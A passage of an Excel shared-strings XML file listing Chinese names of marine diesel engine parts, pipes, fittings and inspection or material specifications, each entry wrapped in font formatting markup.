        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>半式</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>四半式刮油环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>椭圆形垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>方垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>半式</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>曲轴齿轮（整体式）</t>
  </si>
  <si>
    <t>供油单元齿轮</t>
  </si>
  <si>
    <t>齿轮测量规范</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>活塞杆填料函</t>
  </si>
  <si>
    <t>格栅</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>研磨装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>研磨工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>倒销</t>
  </si>
  <si>
    <t>导向活塞</t>
  </si>
  <si>
    <t>导板条</t>
  </si>
  <si>
    <t>导滑块</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑块中间部分</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>主机保护</t>
  </si>
  <si>
    <t>增压器匹配说明</t>
  </si>
  <si>
    <t>主机调校说明</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>半瓦</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>手轮</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油进出加热管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <charset val="134"/>
      </rPr>
      <t>六角螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角头螺丝刀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内六角头螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <charset val="134"/>
      </rPr>
      <t>六角螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>燃油高压油管</t>
  </si>
  <si>
    <t>高压油管</t>
  </si>
  <si>
    <t>伺服油高压油管</t>
  </si>
  <si>
    <t>铰链</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带铰链盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>半式</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>软管进口</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软管架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>壳体</t>
  </si>
  <si>
    <t>两半式壳体</t>
  </si>
  <si>
    <t>横向液压装置</t>
  </si>
  <si>
    <t>液压管</t>
  </si>
  <si>
    <t>排气阀液压管</t>
  </si>
  <si>
    <t>流量指示器</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>感应开关</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>喷油控制单元</t>
  </si>
  <si>
    <t>喷油嘴总成</t>
  </si>
  <si>
    <t>进口管</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>探头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>内部活塞</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内壁板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>检查和拆卸</t>
  </si>
  <si>
    <t>十字头销表面检验规范</t>
  </si>
  <si>
    <r>
      <t>INSTR. VT</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊缝</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>冲洗说明</t>
  </si>
  <si>
    <t>压力测试说明</t>
  </si>
  <si>
    <t>热处理规范</t>
  </si>
  <si>
    <t>试验规范和说明</t>
  </si>
  <si>
    <t>仪表板</t>
  </si>
  <si>
    <t>绝热层</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套绝缘层</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>绝缘层规范</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器转速表隔离模块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口规范</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>中间块</t>
  </si>
  <si>
    <t>中间管</t>
  </si>
  <si>
    <t>中间环</t>
  </si>
  <si>
    <t>中间齿轮</t>
  </si>
  <si>
    <t>中间齿轮安装</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防护板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>旋钮螺钉</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <charset val="134"/>
      </rPr>
      <t>灯座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>漏油集油器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄放油收集总管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>漏油排油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>漏油出油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>泄漏油管</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>漏油收集</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洗系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>清洗系统管路</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液位开关</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座较平</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手扳葫芦</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊装和拆卸齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊装件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊装支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>电灯泡</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <charset val="134"/>
      </rPr>
      <t>照明布置图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>限位开关</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>胶水规范</t>
  </si>
  <si>
    <t>ID码清单</t>
  </si>
  <si>
    <t>锁紧填料函</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低压三位分流球阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>下半轴瓦</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>下壳体</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底部连杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下平台扫气侧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下平台燃油侧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下平台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部二半环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底部环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>半式</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>下弹簧作</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油排油柜</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>气缸注油泵</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊耳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>加工规范</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气总管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>主轴承安装件</t>
  </si>
  <si>
    <t>主轴承盖</t>
  </si>
  <si>
    <t>主轴承轴瓦</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴瓦下半部分</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴瓦上半部分</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>走台安装件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外螺纹接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手动吊</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>标记说明</t>
  </si>
  <si>
    <t>材料和加工说明</t>
  </si>
  <si>
    <t>材质和检验规范</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>材质和实验规范</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>缸套材料质量规范</t>
  </si>
  <si>
    <t>材料转换表</t>
  </si>
  <si>
    <t>材料说明</t>
  </si>
  <si>
    <t>零件清单</t>
  </si>
  <si>
    <t>材料表</t>
  </si>
  <si>
    <t>材料/试验说明</t>
  </si>
  <si>
    <t>材质规范</t>
  </si>
  <si>
    <t>测量管</t>
  </si>
  <si>
    <t>柴油机故障时的措施</t>
  </si>
  <si>
    <t>测量缸</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量仪表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量点</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>金属软管接头</t>
  </si>
  <si>
    <t>混油桶</t>
  </si>
  <si>
    <t>机架焊接</t>
  </si>
  <si>
    <t>机架加工</t>
  </si>
  <si>
    <t>安装卡环</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>安装导轨</t>
  </si>
  <si>
    <t>安装/调节说明</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆头旋钮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铭牌</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机控制系统铭牌</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>电缆铭牌</t>
  </si>
  <si>
    <t>接线箱铭牌</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>针阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>渗碳氮化规范</t>
  </si>
  <si>
    <t>止回阀</t>
  </si>
  <si>
    <t>通用轴承座</t>
  </si>
  <si>
    <r>
      <t>NOVO-TECH</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加紧手柄</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>喷嘴</t>
  </si>
  <si>
    <t>喷嘴体</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀体包含针阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>喷嘴座</t>
  </si>
  <si>
    <t>喷嘴规范</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接头螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺母件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>挡油盖</t>
  </si>
  <si>
    <t>供油管</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>泄漏油收集罐</t>
  </si>
  <si>
    <t>伺服油进油管/排放管</t>
  </si>
  <si>
    <t>泄漏油监测</t>
  </si>
  <si>
    <t>泄漏油回油管</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承油管驱动端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>供油单元排放管</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>主轴承油管</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器进油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>增压器滑油出口管</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油滤网</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供油衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>油槽</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油雾探测器清洗包</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>盘车机操纵盒</t>
  </si>
  <si>
    <t>盘车机开关箱</t>
  </si>
  <si>
    <t>增压器故障时运行</t>
  </si>
  <si>
    <t>订货和检验规范</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>订货规范</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流孔板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>伺服油节流孔</t>
  </si>
  <si>
    <t>O型圈材料规范</t>
  </si>
  <si>
    <t>出口管</t>
  </si>
  <si>
    <t>外部活塞</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检修装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬条</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
